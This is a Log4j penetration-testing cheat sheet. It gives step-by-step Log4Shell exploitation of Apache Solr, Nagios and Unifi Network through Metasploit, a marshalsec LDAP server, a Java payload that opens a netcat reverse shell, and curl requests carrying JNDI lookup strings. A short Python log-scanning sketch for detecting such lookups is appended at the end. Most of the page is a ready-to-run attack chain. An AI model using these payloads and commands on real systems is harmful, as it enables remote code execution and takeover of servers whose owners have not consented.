Log4j Pentesting

Log4j is affected by zero-day vulnerabilities such as Log4Shell and Log4Unifi.

msfconsole
msf> use exploit/multi/http/log4shell_header_injection
msf> set HTTP_HEADER ACCEPT
msf> set RHOSTS <target-ip>
msf> set SRVHOST <local-ip>
msf> set SRVPORT 1389
# e.g. Nagios
msf> set TARGETURI /~logs
msf> set LHOST <local-ip>
msf> run
shell


Exploit Apache Solr (JNDI)

You need four local terminals.

1. Start LDAP Server on Your Local Terminal 1

  1. Install Maven
    sudo apt install maven
  2. Get the Payload

    Download the repository.

    git clone https://github.com/mbechler/marshalsec.git
    cd marshalsec

    Then build the marshalsec utility.

    mvn clean package -DskipTests
  3. Start LDAP Server
    java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your-local-ip>:8000/#Exploit"

2. Host the Exploit on Your Local Terminal 2

  1. Create the Exploit with Java

    First, create a new directory and, inside it, a new file named "Exploit.java".
    Open it in your favorite editor, such as vim.

    mkdir exploit
    cd exploit
    vim Exploit.java

    In the editor, enter the following code.

    public class Exploit {
        static {
            try {
                java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <your-local-ip> <your-local-listener-port>");
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
  2. Compile the Payload
    javac Exploit.java -source 8 -target 8
  3. Start Web Server to Host the Payload
    python3 -m http.server 8000

3. Open Listener on Your Local Terminal 3

nc -lvnp <your-local-listener-port>

4. Send a Request to the Target Website

# Apache Solr
curl 'http://<target-ip>:<target-port>/solr/admin/cores?foo=${jndi:ldap://<local-ip>:1389/Exploit}'

# Nagios
curl http://<target-ip>:<target-port>/~logs -H 'Accept: ${jndi:ldap://<local-ip>:1389/Exploit}'


Exploit Unifi Network using Log4Unifi

Log4Unifi is a tool for exploiting Log4j in Unifi Network.

1. Test the Vulnerability in the Target Web Page

curl -i -s -k -X POST -H $'Host: vulnerable.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://9ulral.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://<target-ip>:8443/api/login'

2. Open Listener on Your Local Machine

nc -lvnp 4444

3. Exploit

Download the exploit from the repository.

git clone https://github.com/puzzlepeaches/Log4jUnifi
cd Log4jUnifi

Run the exploit.

python exploit.py -u https://<target-ip>:8443 -i <your-local-ip> -p 4444
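
The requests on this page carry the lookup string in three places: a query parameter (Solr), an Accept header (Nagios), and the "remember" field of a JSON login body (Unifi). The following detection sketch is an added example, not part of the original page: it percent-decodes log lines and extracts the callback scheme, host, port and path from each lookup. The log line formats, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Literal lookup form used on this page: ${jndi:<scheme>://<host>[:<port>][/<path>]}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

# Constructed sample lines (documentation addresses only), one per request shape.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /solr/admin/cores'
    '?foo=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2FExploit%7D HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Dec/2021:10:00:02 +0000] "GET /~logs HTTP/1.1" 200 88 '
    'accept="${jndi:ldap://198.51.100.7:1389/Exploit}"',
    'POST /api/login body={"username":"a","password":"a",'
    '"remember":"${jndi:ldap://callback.example.test:1389/o=tomcat}","strict":true}',
    '203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 90',
]


def normalize(line, rounds=3):
    """Percent-decode up to `rounds` times so encoded request lines still match."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def find_jndi_lookups(line):
    """Return (scheme, host, port, path) for every JNDI lookup in one log line."""
    return [
        (m["scheme"].lower(), m["host"], int(m["port"]) if m["port"] else None, m["path"] or "")
        for m in JNDI_RE.finditer(normalize(line))
    ]


def scan(lines):
    """Return (line_number, lookup) pairs; the hosts are callback servers to block and hunt for."""
    return [(n, hit) for n, line in enumerate(lines, 1) for hit in find_jndi_lookups(line)]


if __name__ == "__main__":
    for n, (scheme, host, port, path) in scan(SAMPLE_LOG):
        print(f"line {n}: {scheme}://{host}:{port}{path}")
```

The header and body cases are only visible if the server or a proxy in front of it is configured to log them. The pattern matches only the literal lookup form shown on this page.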